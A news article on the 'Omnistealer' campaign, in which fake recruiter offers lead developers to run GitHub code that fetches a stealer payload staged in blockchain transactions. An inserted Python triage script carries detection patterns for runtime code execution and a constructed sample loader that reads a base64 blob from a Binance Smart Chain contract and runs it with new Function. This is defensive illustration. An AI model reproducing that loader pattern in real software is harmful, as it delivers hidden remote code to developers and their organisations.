
Hidden in Plain Sight: Blockchain-Based ‘Omnistealer’ Malware Spreads via Fake Job Offers

Initially resembling a typical phishing scheme, the operation turned out to be far more dangerous.

What began as a seemingly routine freelance opportunity quickly unraveled into a major cybersecurity discovery. Last year, the vice president of engineering at blockchain analytics firm Crystal Intelligence received a LinkedIn message offering web development work. Suspicious of the approach—given the rise of scams tied to fake job offers—he investigated further and uncovered something alarming.

The assignment required running code hosted on GitHub. On closer inspection, the code concealed the early stages of a sophisticated cyberattack. Designed to appear harmless, it could easily deceive developers into executing it as part of routine contract work.

Once activated, the code connects to blockchain networks such as TRON and Aptos, extracting data that points toward the Binance Smart Chain. From there, an additional payload is retrieved. According to Nick Smart, Crystal Intelligence’s chief intelligence officer, this final stage “fetches the final form—malicious code,” enabling extensive data theft from infected systems.
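The staging described above relies on two traits appearing in the same project: source that reads data from a blockchain, and source that executes code it did not ship with. The following script is an added example, not code from the article, Crystal Intelligence or Ransom-ISAC; it triages an untrusted repository for that combination before anyone runs it. Every indicator pattern in it is an assumption chosen for illustration, not a published indicator list, and the sample repository is constructed in memory so the script runs offline.

```python
"""Heuristic triage of an untrusted repository before anyone runs it.

Added example: not code from the article, Crystal Intelligence or
Ransom-ISAC. It looks for the two traits the article describes together:
files that read data from a blockchain and files that execute code
assembled at runtime. All indicator patterns are assumptions chosen
for illustration, not a published indicator list.
"""
import re
from pathlib import Path

# Signs that a file pulls data from a chain (assumed indicator set).
CHAIN_READ = {
    "rpc_endpoint": re.compile(r"bsc-dataseed|trongrid\.io|aptoslabs\.com", re.I),
    "chain_library": re.compile(r"\b(web3|ethers|tronweb|aptos)\b", re.I),
    "contract_read": re.compile(r"eth_call|\.call\(\)|getTransaction|getAccountResource"),
}
# Signs that a file runs code it did not ship with (assumed indicator set).
DYNAMIC_EXEC = {
    "eval_like": re.compile(r"\beval\s*\(|new\s+Function\s*\(|vm\.runIn\w*\(|\bexec\s*\("),
    "decode_blob": re.compile(r"atob\s*\(|from\s*\([^)]*base64|b64decode\s*\("),
    "spawn": re.compile(r"child_process|subprocess\.|os\.system"),
}
REMOTE_FETCH = re.compile(r"\bfetch\s*\(|axios\.|https?\.get\s*\(|requests\.get\s*\(", re.I)
SOURCE_SUFFIXES = {".js", ".mjs", ".cjs", ".ts", ".py", ".json"}


def scan_file(text):
    """Return which indicator families a single file triggers."""
    return {
        "chain_read": sorted(k for k, p in CHAIN_READ.items() if p.search(text)),
        "dynamic_exec": sorted(k for k, p in DYNAMIC_EXEC.items() if p.search(text)),
        "remote_fetch": bool(REMOTE_FETCH.search(text)),
    }


def triage(files):
    """files: {relative path: source text}. Returns per-file hits and a verdict.

    The verdict is repository-wide because a loader can be split across
    files: one reads the chain, another executes what was read.
    """
    report = {path: scan_file(text) for path, text in files.items()}
    chain = sorted(p for p, r in report.items() if r["chain_read"])
    dyn = sorted(p for p, r in report.items() if r["dynamic_exec"])
    fetch = sorted(p for p, r in report.items() if r["remote_fetch"])
    if chain and dyn:
        verdict = "high"      # chain read plus runtime execution: review before running
    elif dyn and fetch:
        verdict = "medium"    # downloads something and executes it at runtime
    elif dyn or chain or fetch:
        verdict = "low"
    else:
        verdict = "clean"
    return {"verdict": verdict, "chain_read_files": chain,
            "dynamic_exec_files": dyn, "remote_fetch_files": fetch, "files": report}


def load_tree(root):
    """Read source files under root (skipping dependency dirs) into a dict for triage()."""
    root = Path(root)
    files = {}
    for path in root.rglob("*"):
        if (path.suffix in SOURCE_SUFFIXES and path.is_file()
                and not any(part in {"node_modules", ".git", "venv"} for part in path.parts)):
            files[str(path.relative_to(root))] = path.read_text(errors="replace")
    return files


# Constructed sample repository (not from the article), kept in memory so this runs offline.
SAMPLE_REPO = {
    "package.json": '{"name": "demo-task", "version": "1.0.0"}',
    "src/utils.js": "export const sum = (a, b) => a + b;",
    "src/config.js": (
        'const rpc = "https://bsc-dataseed.binance.org/";\n'
        "const web3 = new Web3(rpc);\n"
        "export const blob = await contract.methods.getConfig().call();\n"
    ),
    "src/loader.js": (
        'import { blob } from "./config.js";\n'
        'const code = Buffer.from(blob, "base64").toString();\n'
        "new Function(code)();\n"
    ),
}

if __name__ == "__main__":
    result = triage(SAMPLE_REPO)
    print("verdict:", result["verdict"])
    for path, hits in result["files"].items():
        if hits["chain_read"] or hits["dynamic_exec"] or hits["remote_fetch"]:
            print(f"  {path}: {hits}")
```

Run it against a cloned repository with `triage(load_tree("path/to/clone"))`. The verdict is deliberately computed across the whole tree rather than per file, because the chain read and the execution step need not live in the same file; a "high" result is a reason to read the code by hand or run it in an isolated environment, not proof of malice, and a "clean" result only means these particular heuristics did not fire.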

Cybersecurity experts at Ransom-ISAC, a collaborative group of global researchers, have named this malware “Omnistealer.” Its capabilities are vast. “It literally steals everything,” said Ellis Stannard, a core member of the group. Their analysis revealed compatibility with over 60 cryptocurrency wallets, including MetaMask and Coinbase, as well as numerous password managers like LastPass, popular browsers such as Chrome and Firefox, and cloud platforms including Google Drive. Beyond cryptocurrency, the malware can extract sensitive credentials and access permissions.

Initially resembling a typical phishing scheme, the operation turned out to be far more dangerous. By embedding malicious code in blockchain transactions—where data is permanent and difficult to remove—attackers have created a persistent and scalable threat. Researchers warn that once deployed, the malware does not distinguish between personal and corporate data, putting both individuals and organizations at risk.

Investigators say the scale of the attack could surpass that of WannaCry, the global ransomware outbreak that impacted over 200,000 computers in 2017. So far, approximately 300,000 compromised credentials have been linked to this campaign, though experts believe this figure may represent only a fraction of the total.

Further analysis traced parts of the operation to suspicious IP addresses, including one linked to a former U.S. consulate site in Vladivostok, Russia—previously associated with North Korean cyber activities. Smart noted the financial scale of the operation, explaining that hackers leveraging this method have accumulated millions in cryptocurrency.

Researchers also discovered that elements of the malicious code had been quietly embedded in blockchain transactions years before being activated, functioning like dormant digital triggers. “Hiding malicious payloads within blockchain has become an emerging obfuscation technique,” reads a blog post written by collaborators at Ransom-ISAC.

The attack primarily targets software developers and contractors. Hackers pose either as recruiters offering jobs or as freelancers seeking employment. In both cases, they exploit trust to gain access to systems or credentials. Victims have included organizations across various sectors, from financial services and defense to technology and even food delivery businesses.

“Since this case, I haven't been able to look at GitHub the same way,” Stannard said, reflecting on how attackers embed malicious code into legitimate-looking repositories.

Evidence increasingly points to involvement by North Korean state-backed groups. Infrastructure, malware patterns, and cryptocurrency wallets used in the campaign overlap with known operations linked to such actors. Some wallets have even been tied to previous large-scale cyber thefts.

Experts suggest multiple possible motives, including financial gain, credential harvesting for identity fabrication, or enabling covert access to targeted organizations. “Everything about this has DPRK written all over it,” Stannard said, emphasizing the organized and strategic nature of the operation.

The FBI has acknowledged awareness of such tactics, stating: “This technique highlights the continuing evolution of the DPRK's ability to exploit the web3 space.”

Adding another layer of mystery, investigators uncovered unusual files hidden alongside the malware, including audio clips, images, and even technical documents. While their purpose remains unclear, researchers speculate these may represent experiments in covert data storage or communication.

As blockchain adoption grows, experts warn that such techniques will likely become more common. The combination of low-cost execution, permanence of blockchain data, and increasingly accessible coding tools—including AI—makes these attacks easier to replicate and harder to eliminate.

Authorities have been notified, but with investigations ongoing, many questions remain unanswered. For now, cybersecurity professionals urge caution—especially when dealing with unfamiliar code or unsolicited job offers, even from seemingly trusted platforms.